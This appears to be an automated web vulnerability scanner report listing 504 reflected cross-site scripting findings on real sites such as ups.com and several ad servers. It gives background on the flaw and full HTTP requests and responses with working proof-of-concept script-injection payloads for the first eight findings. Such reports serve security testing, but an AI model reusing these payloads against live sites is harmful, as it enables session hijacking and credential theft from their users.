1.327. http://www.ups.com/content/us/en/freight/customsbrokerage.html [REST URL parameter 3]

1.328. http://www.ups.com/content/us/en/freight/expedite.html [REST URL parameter 2]

1.329. http://www.ups.com/content/us/en/freight/expedite.html [REST URL parameter 3]

1.330. http://www.ups.com/content/us/en/freight/index.html [REST URL parameter 2]

1.331. http://www.ups.com/content/us/en/freight/index.html [REST URL parameter 3]

1.332. http://www.ups.com/content/us/en/freight/ocean_freight.html [REST URL parameter 2]

1.333. http://www.ups.com/content/us/en/freight/ocean_freight.html [REST URL parameter 3]

1.334. http://www.ups.com/content/us/en/freight/road_freight.html [REST URL parameter 2]

1.335. http://www.ups.com/content/us/en/freight/road_freight.html [REST URL parameter 3]

1.336. http://www.ups.com/content/us/en/index.jsx [REST URL parameter 2]

1.337. http://www.ups.com/content/us/en/index.jsx [REST URL parameter 3]

1.338. http://www.ups.com/content/us/en/locations/alliances/index.html [REST URL parameter 2]

1.339. http://www.ups.com/content/us/en/locations/alliances/index.html [REST URL parameter 3]

1.340. http://www.ups.com/content/us/en/locations/aso/index.html [REST URL parameter 2]

1.341. http://www.ups.com/content/us/en/locations/aso/index.html [REST URL parameter 3]

1.342. http://www.ups.com/content/us/en/locations/custcenters/index.html [REST URL parameter 2]

1.343. http://www.ups.com/content/us/en/locations/custcenters/index.html [REST URL parameter 3]

1.344. http://www.ups.com/content/us/en/locations/dropboxes/index.html [REST URL parameter 2]

1.345. http://www.ups.com/content/us/en/locations/dropboxes/index.html [REST URL parameter 3]

1.346. http://www.ups.com/content/us/en/locations/store/index.html [REST URL parameter 2]

1.347. http://www.ups.com/content/us/en/locations/store/index.html [REST URL parameter 3]

1.348. http://www.ups.com/content/us/en/myups/billing/index.html [REST URL parameter 2]

1.349. http://www.ups.com/content/us/en/myups/billing/index.html [REST URL parameter 3]

1.350. http://www.ups.com/content/us/en/myups/mgmt/index.html [REST URL parameter 2]

1.351. http://www.ups.com/content/us/en/myups/mgmt/index.html [REST URL parameter 3]

1.352. http://www.ups.com/content/us/en/register/help/index.html [REST URL parameter 2]

1.353. http://www.ups.com/content/us/en/register/help/index.html [REST URL parameter 3]

1.354. http://www.ups.com/content/us/en/register/reasons/index.html [REST URL parameter 2]

1.355. http://www.ups.com/content/us/en/register/reasons/index.html [REST URL parameter 3]

1.356. http://www.ups.com/content/us/en/resources/index.html [REST URL parameter 2]

1.357. http://www.ups.com/content/us/en/resources/index.html [REST URL parameter 3]

1.358. http://www.ups.com/content/us/en/resources/pay/index.html [REST URL parameter 2]

1.359. http://www.ups.com/content/us/en/resources/pay/index.html [REST URL parameter 3]

1.360. http://www.ups.com/content/us/en/resources/service/delivery_change.html [REST URL parameter 2]

1.361. http://www.ups.com/content/us/en/resources/service/delivery_change.html [REST URL parameter 3]

1.362. http://www.ups.com/content/us/en/resources/service/index.html [REST URL parameter 2]

1.363. http://www.ups.com/content/us/en/resources/service/index.html [REST URL parameter 3]

1.364. http://www.ups.com/content/us/en/resources/ship/fraud.html [REST URL parameter 2]

1.365. http://www.ups.com/content/us/en/resources/ship/fraud.html [REST URL parameter 3]

1.366. http://www.ups.com/content/us/en/resources/ship/index.html [REST URL parameter 2]

1.367. http://www.ups.com/content/us/en/resources/ship/index.html [REST URL parameter 3]

1.368. http://www.ups.com/content/us/en/resources/ship/terms/privacy.html [REST URL parameter 2]

1.369. http://www.ups.com/content/us/en/resources/ship/terms/privacy.html [REST URL parameter 3]

1.370. http://www.ups.com/content/us/en/resources/ship/terms/shipping/index.html [REST URL parameter 2]

1.371. http://www.ups.com/content/us/en/resources/ship/terms/shipping/index.html [REST URL parameter 3]

1.372. http://www.ups.com/content/us/en/resources/ship/terms/use.html [REST URL parameter 2]

1.373. http://www.ups.com/content/us/en/resources/ship/terms/use.html [REST URL parameter 3]

1.374. http://www.ups.com/content/us/en/resources/start/index.html [REST URL parameter 2]

1.375. http://www.ups.com/content/us/en/resources/start/index.html [REST URL parameter 3]

1.376. http://www.ups.com/content/us/en/resources/techsupport/index.html [REST URL parameter 2]

1.377. http://www.ups.com/content/us/en/resources/techsupport/index.html [REST URL parameter 3]

1.378. http://www.ups.com/content/us/en/resources/track/index.html [REST URL parameter 2]

1.379. http://www.ups.com/content/us/en/resources/track/index.html [REST URL parameter 3]

1.380. http://www.ups.com/content/us/en/shipping/index.html [REST URL parameter 2]

1.381. http://www.ups.com/content/us/en/shipping/index.html [REST URL parameter 3]

1.382. http://www.ups.com/content/us/en/shipping/time/service/index.html [REST URL parameter 2]

1.383. http://www.ups.com/content/us/en/shipping/time/service/index.html [REST URL parameter 3]

1.384. http://www.ups.com/content/us/en/shipping/time/service/shipping/index.html [REST URL parameter 2]

1.385. http://www.ups.com/content/us/en/shipping/time/service/shipping/index.html [REST URL parameter 3]

1.386. http://www.ups.com/content/us/en/siteguide/index.html [REST URL parameter 2]

1.387. http://www.ups.com/content/us/en/siteguide/index.html [REST URL parameter 3]

1.388. http://www.ups.com/content/us/en/tracking/fgv/index.html [REST URL parameter 2]

1.389. http://www.ups.com/content/us/en/tracking/fgv/index.html [REST URL parameter 3]

1.390. http://www.ups.com/content/us/en/tracking/quantumview/index.html [REST URL parameter 2]

1.391. http://www.ups.com/content/us/en/tracking/quantumview/index.html [REST URL parameter 3]

1.392. http://www.ups.com/content/us/en/tracking/tools/index.html [REST URL parameter 2]

1.393. http://www.ups.com/content/us/en/tracking/tools/index.html [REST URL parameter 3]

1.394. http://www.ups.com/dropoff [WT.svl parameter]

1.395. http://www.ups.com/dropoff [loc parameter]

1.396. http://www.ups.com/dropoff [name of an arbitrarily supplied request parameter]

1.397. https://www.ups.com/account/am/start [REST URL parameter 2]

1.398. https://www.ups.com/account/am/start [REST URL parameter 2]

1.399. https://www.ups.com/account/am/start [REST URL parameter 2]

1.400. https://www.ups.com/account/am/start [REST URL parameter 3]

1.401. https://www.ups.com/account/am/start [REST URL parameter 3]

1.402. https://www.ups.com/account/am/start [REST URL parameter 3]

1.403. https://www.ups.com/account/am/start [loc parameter]

1.404. https://www.ups.com/account/am/start [loc parameter]

1.405. https://www.ups.com/account/am/start [loc parameter]

1.406. https://www.ups.com/account/us/start [REST URL parameter 2]

1.407. https://www.ups.com/account/us/start [REST URL parameter 2]

1.408. https://www.ups.com/account/us/start [REST URL parameter 2]

1.409. https://www.ups.com/account/us/start [REST URL parameter 3]

1.410. https://www.ups.com/account/us/start [REST URL parameter 3]

1.411. https://www.ups.com/account/us/start [REST URL parameter 3]

1.412. https://www.ups.com/account/us/start [loc parameter]

1.413. https://www.ups.com/account/us/start [loc parameter]

1.414. https://www.ups.com/account/us/start [loc parameter]

1.415. https://www.ups.com/cva [REST URL parameter 1]

1.416. https://www.ups.com/cva [REST URL parameter 1]

1.417. https://www.ups.com/cva [REST URL parameter 1]

1.418. https://www.ups.com/cva [loc parameter]

1.419. https://www.ups.com/cva [loc parameter]

1.420. https://www.ups.com/cva [loc parameter]

1.421. https://www.ups.com/myWorkspace/home [REST URL parameter 2]

1.422. https://www.ups.com/myWorkspace/home [REST URL parameter 2]

1.423. https://www.ups.com/myWorkspace/home [REST URL parameter 2]

1.424. https://www.ups.com/myWorkspace/home [loc parameter]

1.425. https://www.ups.com/myWorkspace/home [loc parameter]

1.426. https://www.ups.com/myWorkspace/home [loc parameter]

1.427. https://www.ups.com/myWorkspace/wspref [REST URL parameter 2]

1.428. https://www.ups.com/myWorkspace/wspref [REST URL parameter 2]

1.429. https://www.ups.com/myWorkspace/wspref [REST URL parameter 2]

1.430. https://www.ups.com/myWorkspace/wspref [loc parameter]

1.431. https://www.ups.com/myWorkspace/wspref [loc parameter]

1.432. https://www.ups.com/myWorkspace/wspref [loc parameter]

1.433. https://www.ups.com/myups/addresses [REST URL parameter 2]

1.434. https://www.ups.com/myups/addresses [REST URL parameter 2]

1.435. https://www.ups.com/myups/addresses [REST URL parameter 2]

1.436. https://www.ups.com/myups/addresses [loc parameter]

1.437. https://www.ups.com/myups/addresses [loc parameter]

1.438. https://www.ups.com/myups/addresses [loc parameter]

1.439. https://www.ups.com/myups/forgotpassword [loc parameter]

1.440. https://www.ups.com/one-to-one/forgot [loc parameter]

1.441. https://www.ups.com/one-to-one/register [loc parameter]

1.442. https://www.ups.com/osa/orderSupplies [REST URL parameter 1]

1.443. https://www.ups.com/osa/orderSupplies [REST URL parameter 1]

1.444. https://www.ups.com/osa/orderSupplies [REST URL parameter 1]

1.445. https://www.ups.com/osa/orderSupplies [REST URL parameter 2]

1.446. https://www.ups.com/osa/orderSupplies [REST URL parameter 2]

1.447. https://www.ups.com/osa/orderSupplies [REST URL parameter 2]

1.448. https://www.ups.com/osa/orderSupplies [loc parameter]

1.449. https://www.ups.com/osa/orderSupplies [loc parameter]

1.450. https://www.ups.com/osa/orderSupplies [loc parameter]

1.451. https://www.ups.com/quantum_services/download [loc parameter]

1.452. https://www.ups.com/quantum_services/download [loc parameter]

1.453. https://www.ups.com/quantum_services/download [loc parameter]

1.454. https://www.ups.com/qvadmin/admin [REST URL parameter 1]

1.455. https://www.ups.com/qvadmin/admin [REST URL parameter 1]

1.456. https://www.ups.com/qvadmin/admin [REST URL parameter 1]

1.457. https://www.ups.com/qvadmin/admin [REST URL parameter 2]

1.458. https://www.ups.com/qvadmin/admin [REST URL parameter 2]

1.459. https://www.ups.com/qvadmin/admin [REST URL parameter 2]

1.460. https://www.ups.com/qvadmin/admin [loc parameter]

1.461. https://www.ups.com/qvadmin/admin [loc parameter]

1.462. https://www.ups.com/qvadmin/admin [loc parameter]

1.463. https://www.ups.com/sharp/prefapp [REST URL parameter 2]

1.464. https://www.ups.com/sharp/prefapp [REST URL parameter 2]

1.465. https://www.ups.com/sharp/prefapp [REST URL parameter 2]

1.466. https://www.ups.com/sharp/prefapp [loc parameter]

1.467. https://www.ups.com/sharp/prefapp [loc parameter]

1.468. https://www.ups.com/sharp/prefapp [loc parameter]

1.469. https://www.ups.com/uis/create [REST URL parameter 1]

1.470. https://www.ups.com/uis/create [REST URL parameter 1]

1.471. https://www.ups.com/uis/create [REST URL parameter 1]

1.472. https://www.ups.com/uis/create [REST URL parameter 2]

1.473. https://www.ups.com/uis/create [REST URL parameter 2]

1.474. https://www.ups.com/uis/create [REST URL parameter 2]

1.475. https://www.ups.com/uis/create [loc parameter]

1.476. https://www.ups.com/uis/create [loc parameter]

1.477. https://www.ups.com/uis/create [loc parameter]

1.478. http://www.webbyawards.com/webbys/current_honorees.php [media_id parameter]

1.479. http://www.webbyawards.com/webbys/current_honorees.php [season parameter]

1.480. http://www.wikia.com/index.php [actionName parameter]

1.481. http://api.bizographics.com/v1/profile.json [Referer HTTP header]

1.482. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [Referer HTTP header]

1.483. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [User-Agent HTTP header]

1.484. http://www.ups.com/homepage/ddhandler/handler.jsp [Referer HTTP header]

1.485. https://www.ups.com/homepage/ddhandler/handler.jsp [Referer HTTP header]

1.486. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

1.487. http://ar.voicefive.com/bmx3/broker.pli [ar_da39f516a098b3de) ar_p68511049 cookie]

1.488. http://ar.voicefive.com/bmx3/broker.pli [ar_p45555483 cookie]

1.489. http://ar.voicefive.com/bmx3/broker.pli [ar_p67161473 cookie]

1.490. http://ar.voicefive.com/bmx3/broker.pli [ar_p83612734 cookie]

1.491. http://ar.voicefive.com/bmx3/broker.pli [ar_p84053757 cookie]

1.492. http://ar.voicefive.com/bmx3/broker.pli [ar_p84068139 cookie]

1.493. http://ar.voicefive.com/bmx3/broker.pli [ar_p84532700 cookie]

1.494. http://ar.voicefive.com/bmx3/broker.pli [ar_p85001580 cookie]

1.495. http://ar.voicefive.com/bmx3/broker.pli [ar_p86183782 cookie]

1.496. http://ar.voicefive.com/bmx3/broker.pli [ar_s_p84053757 cookie]

1.497. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [ZEDOIDA cookie]

1.498. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [ZEDOIDA cookie]

1.499. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [ZEDOIDA cookie]

1.500. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [ZEDOIDA cookie]

1.501. http://ib.adnxs.com/acb [acb816623 cookie]

1.502. http://k.collective-media.net/cmadj/cm.dailymail/ron_052010 [cli cookie]

1.503. http://tag.contextweb.com/TAGPUBLISH/getad.aspx [V cookie]

1.504. http://tag.contextweb.com/TAGPUBLISH/getad.aspx [cwbh1 cookie]



1. Cross-site scripting (reflected)
There are 504 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.



1.1. http://a.collective-media.net/ad/cm.dailymail/ron_052010 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /ad/cm.dailymail/ron_052010

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a3b2a<script>alert(1)</script>2a020577f18 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ada3b2a<script>alert(1)</script>2a020577f18/cm.dailymail/ron_052010;sz=300x250;ord=3461791? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; apnx=1; qcms=1; blue=1; qcdp=1; dc=dc; mmpg=1

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Content-Type: text/html
Content-Length: 113
Date: Mon, 14 Feb 2011 01:37:38 GMT
Connection: close
Vary: Accept-Encoding

unknown path /ada3b2a<script>alert(1)</script>2a020577f18/cm.dailymail/ron_052010;cmw=nurl;sz=300x250;ord=3461791

1.2. http://a.collective-media.net/ad/cm.drudgerep/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /ad/cm.drudgerep/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 91f06<script>alert(1)</script>bbd480d1b59 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad91f06<script>alert(1)</script>bbd480d1b59/cm.drudgerep/;sz=300x250;click0=;ord=[timestamp]? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Content-Type: text/html
Content-Length: 115
Date: Mon, 14 Feb 2011 02:10:23 GMT
Connection: close
Vary: Accept-Encoding

unknown path /ad91f06<script>alert(1)</script>bbd480d1b59/cm.drudgerep/;cmw=nurl;sz=300x250;click0=;ord=[timestamp]

1.3. http://a.collective-media.net/adj/cm.dailymail/ron_052010 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.dailymail/ron_052010

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2dc11'-alert(1)-'c06cd63375f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/cm.dailymail2dc11'-alert(1)-'c06cd63375f/ron_052010;sz=300x250;ord=3412338? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 448
Date: Mon, 14 Feb 2011 01:35:24 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 16-Mar-2011 01:35:24 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.dailymail2dc11'-alert(1)-'c06cd63375f/ron_052010;sz=300x250;net=cm;ord=3412338;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.4. http://a.collective-media.net/adj/cm.dailymail/ron_052010 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.dailymail/ron_052010

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6de2b'-alert(1)-'8f8feffd6d6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/cm.dailymail/ron_0520106de2b'-alert(1)-'8f8feffd6d6;sz=300x250;ord=3412338? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 448
Date: Mon, 14 Feb 2011 01:35:25 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 16-Mar-2011 01:35:25 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.dailymail/ron_0520106de2b'-alert(1)-'8f8feffd6d6;sz=300x250;net=cm;ord=3412338;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.5. http://a.collective-media.net/adj/cm.dailymail/ron_052010 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.dailymail/ron_052010

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e360'-alert(1)-'b71794fc123 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/cm.dailymail/ron_052010;sz=300x250;ord=3412338?&9e360'-alert(1)-'b71794fc123=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 452
Date: Mon, 14 Feb 2011 01:35:24 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 16-Mar-2011 01:35:24 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.dailymail/ron_052010;sz=300x250;net=cm;ord=3412338?&9e360'-alert(1)-'b71794fc123=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.6. http://a.collective-media.net/adj/cm.dailymail/ron_052010 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.dailymail/ron_052010

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7086'-alert(1)-'ae7eaada4f3 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/cm.dailymail/ron_052010;sz=300x250;ord=3412338?d7086'-alert(1)-'ae7eaada4f3 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 449
Date: Mon, 14 Feb 2011 01:35:23 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 16-Mar-2011 01:35:23 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.dailymail/ron_052010;sz=300x250;net=cm;ord=3412338?d7086'-alert(1)-'ae7eaada4f3;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.7. http://a.collective-media.net/adj/cm.drudgerep/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.drudgerep/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22425'-alert(1)-'80a6204c2ff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/cm.drudgerep22425'-alert(1)-'80a6204c2ff/;sz=300x250;click0=;ord=$cacheBuster$ HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 444
Date: Mon, 14 Feb 2011 02:10:20 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 16-Mar-2011 02:10:20 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.drudgerep22425'-alert(1)-'80a6204c2ff/;sz=300x250;net=cm;ord=$cacheBuster$;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.8. http://a.collective-media.net/adj/cm.drudgerep/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.drudgerep/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4b37'-alert(1)-'600aca90b1e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

